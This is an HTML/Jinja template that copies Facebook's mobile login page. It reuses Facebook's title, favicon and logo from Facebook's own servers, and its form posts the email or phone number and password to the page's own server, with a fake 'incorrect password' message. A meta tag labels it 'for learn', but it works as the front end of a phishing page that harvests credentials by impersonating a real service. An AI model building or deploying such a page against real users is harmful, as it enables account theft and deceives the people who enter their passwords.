<!DOCTYPE html>
<html>

<head>
    <meta charset="utf.8">
    <meta name="for learn" content="my site">
    <title>Facebook - log in or sign up</title>
    <link rel="stylesheet" href="static/siteFacebookPHoneDesigne.css">
    <link rel="icon" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png" type="image/x-icon">
    <meta name="viewport" content="width=device-width, initial-scale=1" />


</head>

<body>
    <div id="firstdiv">
        <img id="imgfacebook" src="	https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="facebook">
    </div>
    <form id="seconddiv" method="post">
        <input type="text" name="email" type="number" class="informition" placeholder="Email addres or phone number"
            required>
        <input type="password" name="password" class="informition" placeholder="Password" required>
        {% if error %}
        <div class="error">
            <span>Sorry, your username/password is incorrect</span>
        </div>
        {% else %}
    
        {% endif %}
        <div>
            <button name="log in" type="submit" value="submit">log in </button>
        </div>

        <div class="link">
            <a>Forgotten password?</a>
        </div>

        <hr>

        <div>
            <button name="account" type="submit">Creat new account</button>
        </div>
    </form>




</body>

</html>